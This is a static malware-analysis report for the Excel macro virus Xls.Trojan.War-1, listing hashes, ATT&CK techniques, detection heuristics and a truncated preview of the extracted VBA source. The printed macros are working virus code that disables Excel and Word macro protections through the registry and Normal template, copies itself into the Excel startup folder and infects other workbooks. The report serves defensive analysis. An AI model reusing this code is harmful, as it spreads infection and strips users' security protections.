Xls.Trojan.War-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 bf758fc57317999f…

MALICIOUS

Office (OLE)

33.0 KB Created: 1999-04-13 06:52:33 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: b33d358d7422bb94fd95eaf061150c68 SHA-1: 26eaacc5a58eb7dae06ede4f1a16c0ca38c5ff04 SHA-256: bf758fc57317999fc83e1651a20718742856b8d4d07a290217dcd192ee00b93b
340 Risk Score

Malware Insights

Xls.Trojan.War-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is identified as Xls.Trojan.War-1 by ClamAV, indicating malicious intent. It contains VBA macros, including Auto_Open and Auto_Close, which are designed to execute automatically. The script attempts to modify Excel security settings and create directories for persistence, likely to ensure the malware runs on system startup or when Excel is launched. The presence of Auto_Open and Auto_Close macros strongly suggests it's designed to be delivered as a malicious attachment.

Heuristics 7

  • ClamAV: Xls.Trojan.War-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.War-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8852 bytes
SHA-256: 6b8731e16dc386455be3d5338071fbb6d1b1eca203793b0ad79956bbbb4122ea
Detection
ClamAV: Xls.Trojan.War-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Excel2000 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = 0
End If
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0

If Tudo() Then
    GoTo SejaGay:
Else
    NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
    If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
    For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
        If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
            Tudo = True
        End If
    Next y
    End If
Next x
End Function

Function NoOlho()
  activebook = ActiveWorkbook.Name
  Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
  Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
  Windows("ALEVIRUSCS.XLM").Visible = False
 Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function

Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
    If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
            Amerda = True
   End If
Next y
End Function

Sub Puta()
    oactivebook = ActiveWorkbook.Name
    If Amerda() Then
    GoTo cya
    Else
    End If
    Application.ScreenUpdating = False
    Application.Windows("ALEVIRUSCS.XLM").Visible = True
    Workbooks("ALEVIRUSCS.XLM").Activate
    Sheets("Email").Visible = True
    Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
    Workbooks(oactivebook).Sheets("Email").Visible = False
    Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
    Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub

Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub

Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 5, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 6, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 7, "End Sub"
WordObj.Run "Normal.ThisDocument.AutoExec"
End If
Set NT = Nothing
If Quit = True Then WordObj.Quit
End Sub

Private Sub
... (truncated)